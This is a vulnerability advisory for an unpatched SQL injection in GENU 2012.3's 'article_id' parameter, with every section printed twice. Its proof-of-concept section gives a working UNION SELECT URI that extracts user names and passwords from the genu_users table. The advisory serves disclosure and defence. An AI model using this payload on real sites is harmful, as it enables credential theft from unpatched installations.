GENU 'article_id' Parameter SQL Injection Vulnerability
BID:52924
Info
GENU 'article_id' Parameter SQL Injection Vulnerability
| Bugtraq ID: | 52924 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Apr 05 2012 12:00AM |
| Updated: | Apr 05 2012 12:00AM |
| Credit: | hordcode security |
| Vulnerable: |
GENU GENU 2012.3 |
| Not Vulnerable: | |
Discussion
GENU 'article_id' Parameter SQL Injection Vulnerability
GENU is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
GENU 2012.3 is vulnerable; other versions may also be affected.
GENU is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
GENU 2012.3 is vulnerable; other versions may also be affected.
Exploit / POC
GENU 'article_id' Parameter SQL Injection Vulnerability
An attacker can exploit the issue using a browser.
The following example URI is available:
http://www.example.com/articles/read.php?article_id=null union select 1,concat(user_name,0x3a,0x3a,0x3a,user_password),3,4,5 from genu_users--
An attacker can exploit the issue using a browser.
The following example URI is available:
http://www.example.com/articles/read.php?article_id=null union select 1,concat(user_name,0x3a,0x3a,0x3a,user_password),3,4,5 from genu_users--
Solution / Fix
GENU 'article_id' Parameter SQL Injection Vulnerability
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of any more recent information, please mail us at: [email protected].
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of any more recent information, please mail us at: [email protected].